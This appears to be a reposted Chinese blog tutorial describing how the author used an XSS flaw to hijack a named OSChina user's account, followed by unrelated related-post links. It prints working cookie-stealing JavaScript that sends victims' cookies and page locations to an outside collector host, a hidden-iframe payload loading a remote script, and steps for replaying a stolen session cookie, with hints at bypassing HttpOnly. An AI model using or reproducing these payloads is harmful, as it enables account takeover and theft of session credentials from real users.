《蟋蟀的xss淫荡教程之如何劫持OSC用户账号》
2019独角兽企业重金招聘Python工程师标准>>>
首先,先道歉..让@铂金小猪 成为了受害用户...当了我儿子一天...现在@Soga @皮总 你们知道那天是怎么回事了吧。。
其实今天要讲的是Xss(Cross Site Scripting)的一种利用方式:劫持用户账号
首先需要找到OSChina存在xss注入的地方。:)这里先隐藏。。等@红薯 修复。。。
然后再将带有XSS的url(我使用了google的短链接包装了一下)发给受害者@铂金小猪 。
然后让oschina充满养猪广告的妹纸@铂金小猪 哭了:
不信的话,大家现在还可以去看@铂金小猪 空间左侧的签名
其实xss大家搜搜下就知道怎么利用了。。但是劫持账户上。大家可能觉得有两个难点..我在这里教大家。。
1.如果收到被害者的cookie.
其实可以在自己网站上做一个脚本来进行cookie收集。。。也可以用第三方的cookie收集平台。。
比如xsser.me或者xss.la等。这两个平台都是禁止注册的。。自己写一个就好.很简单
熟悉javascript,简单看下别人偷cookie的代码。。就明白是怎么回事了
var x=new Image();
try
{
var myopener='';
myopener=window.opener && window.opener.location ? window.opener.location : '';
}
catch(err)
{
}
x.src='http://xssapp.com/accept.aspx?id=@pid&location='+escape(document.location)+'&toplocation='+escape(top.document.location)+'&cookie='+escape(document.cookie)+'&opener='+escape(myopener);
self.location="http://my.oschina.net/samshuai";
上面是我的xss javascript代码。。。
再发个别人的一个利用方式:
<iframe onload="this.src='xss 地址+<script src =tmxk.Org/0.js>'" style="display:none"></iframe>
2.获得cookie之后,如何使用?
其实firefox和chrome都有插件可以完成这个功能。直接替换上@铂金小猪 的oscid就可以用他的账号说话了。。
我用的是firefox的web developer toolbar:
@红薯 兼职就是聪明绝顶啊。。。这两天他捣鼓了一个Java EE 6.0 的 Cookie 类已经有设置 HttpOnly 的方法。。
其实使用httponly也是一种防止cookie被盗和被修改的方法。。主要让document.cookie不起作用。这真的能防止cookie被盗么???我笑了。。。。。大家可以说下继续利用的方式。。看看和我的绕过httponly方法是否一致。我的方法里面包裹document.xxx大家想想吧。。。
还有就是使用了httponly真的不能使用工具修改自己的cookie了么??也是有极其淫荡的方式的。。。大家也可以说说。
扩展阅读:
网络攻击技术(二)——Cross-site scripting
Java EE 6.0 的 Cookie 类已经有设置 HttpOnly 的方法
什么是HttpOnly
利用最近热门的Xss漏洞能做什么?
如何解决繁琐的WEB前端的XSS问题
对oschina的一次友情xss测试
转载于:https://my.oschina.net/samshuai/blog/82382
《蟋蟀的xss淫荡教程之如何劫持OSC用户账号》相关推荐
- ComeFuture英伽学院——2020年 全国大学生英语竞赛【C类初赛真题解析】(持续更新)
视频:ComeFuture英伽学院--2019年 全国大学生英语竞赛[C类初赛真题解析]大小作文--详细解析 课件:[课件]2019年大学生英语竞赛C类初赛.pdf 视频:2020年全国大学生英语竞赛 ...
- ComeFuture英伽学院——2019年 全国大学生英语竞赛【C类初赛真题解析】大小作文——详细解析
视频:ComeFuture英伽学院--2019年 全国大学生英语竞赛[C类初赛真题解析]大小作文--详细解析 课件:[课件]2019年大学生英语竞赛C类初赛.pdf 视频:2020年全国大学生英语竞赛 ...
- 信息学奥赛真题解析(玩具谜题)
玩具谜题(2016年信息学奥赛提高组真题) 题目描述 小南有一套可爱的玩具小人, 它们各有不同的职业.有一天, 这些玩具小人把小南的眼镜藏了起来.小南发现玩具小人们围成了一个圈,它们有的面朝圈内,有的 ...
- 信息学奥赛之初赛 第1轮 讲解(01-08课)
信息学奥赛之初赛讲解 01 计算机概述 系统基本结构 信息学奥赛之初赛讲解 01 计算机概述 系统基本结构_哔哩哔哩_bilibili 信息学奥赛之初赛讲解 02 软件系统 计算机语言 进制转换 信息 ...
- 信息学奥赛一本通习题答案(五)
最近在给小学生做C++的入门培训,用的教程是信息学奥赛一本通,刷题网址 http://ybt.ssoier.cn:8088/index.php 现将部分习题的答案放在博客上,希望能给其他有需要的人带来 ...
- 信息学奥赛一本通习题答案(三)
最近在给小学生做C++的入门培训,用的教程是信息学奥赛一本通,刷题网址 http://ybt.ssoier.cn:8088/index.php 现将部分习题的答案放在博客上,希望能给其他有需要的人带来 ...
- 信息学奥赛一本通 提高篇 第六部分 数学基础 相关的真题
第1章 快速幂 1875:[13NOIP提高组]转圈游戏 信息学奥赛一本通(C++版)在线评测系统 第2 章 素数 第 3 章 约数 第 4 章 同余问题 第 5 章 矩阵乘法 第 6 章 ...
- 信息学奥赛一本通题目代码(非题库)
为了完善自己学c++,很多人都去读相关文献,就比如<信息学奥赛一本通>,可又对题目无从下手,从今天开始,我将把书上的题目一 一的解析下来,可以做参考,如果有错,可以告诉我,将在下次解析里重 ...
- 信息学奥赛一本通(C++版) 刷题 记录
总目录详见:https://blog.csdn.net/mrcrack/article/details/86501716 信息学奥赛一本通(C++版) 刷题 记录 http://ybt.ssoier. ...
- 最近公共祖先三种算法详解 + 模板题 建议新手收藏 例题: 信息学奥赛一本通 祖孙询问 距离
首先什么是最近公共祖先?? 如图:红色节点的祖先为红色的1, 2, 3. 绿色节点的祖先为绿色的1, 2, 3, 4. 他们的最近公共祖先即他们最先相交的地方,如在上图中黄色的点就是他们的最近公共祖先 ...
最新文章
- JGG:遗传发育所白洋组和曹晓风组-水稻组蛋白甲基化调控根系核心菌群
- 机房空调制冷、加热、加湿、除湿这些功能如何应用?
- springboot-mail
- 廖雪峰python教程菜鸟变高手_python怎样
- 最大公约数python语言算法_使用Python求解最大公约数的实现方法
- 聊一聊 java8 中的 Optional
- 如何安装oracle数据库
- 基于CSS class的事件监听管理机制 (转)
- ipad iphone横屏竖屏
- 朱嘉明《火药:改变了人类历史演变模式》
- win10c盘扩容_系统C盘满了空间不足的扩容?
- rpg服务器无限刷金币bug,魔兽世界怀旧服:邮箱交易BUG无限刷金币?小号回档一次1000金!...
- Anyka云平台调用api
- 程序员拒绝春节带电脑回家被开除;小米国行不再支持安装Google框架;Excel具备图灵完备性,成第一大编程语言 | 架构视点...
- 机器人,给我来一瓶82年的农夫山泉
- ogg文件怎么转换为mp3格式?
- 编写python爬虫 获取中华英才网全网工资数据
- 十二、阿里云 maven 配置
- JAVA保存数据库前验证字符串长度
- ASM磁盘头损坏修复
热门文章
- 网络安全乱流,超级保护才是根本
- 印度人写的java代码
- verilog练习:hdlbits网站上的做题笔记(8)
- 【耀杨的前世今生】耀杨的毕生所学——《狗叫江湖》之“葫芦给学习法”(1)
- Boosting 介绍和 Python 实现
- 金山办公:订阅为王?
- 面试题61. 扑克牌中的顺子
- 汽车价格预测回归分析模型
- python设计一个动物类_【Python】每日一练:设计圆类计算周长和面积、设计动物类...
- MacBook Pro 时间机器备份(完美解决连接移动硬盘无反应)